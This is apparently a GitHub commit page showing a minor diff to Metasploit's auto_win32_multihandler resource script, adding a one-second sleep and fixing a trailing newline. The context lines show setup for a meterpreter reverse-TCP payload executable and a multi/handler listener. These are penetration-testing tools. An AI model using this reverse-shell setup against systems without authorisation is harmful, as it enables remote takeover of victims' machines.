We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
There was an error while loading. Please reload this page.
1 parent 3640e87 commit f082fd5Copy full SHA for f082fd5
scripts/resource/auto_win32_multihandler.rc
@@ -13,6 +13,10 @@ def out_path
13
"#{Msf::Config::local_directory}/meterpreter_reverse_tcp.exe"
14
end
15
16
+# Please see:
17
+# https://github.com/rapid7/metasploit-framework/issues/7603
18
+sleep(1)
19
+
20
run_single("use payload/#{PAYLOAD}")
21
run_single("set lhost #{payload_lhost}")
22
run_single("set lport #{payload_lport}")
@@ -25,4 +29,4 @@ run_single("set lhost #{payload_lhost}")
25
29
26
30
run_single('set exitonsession false')
27
31
run_single('run -j')
28
-</ruby>
32
+</ruby>
0 commit comments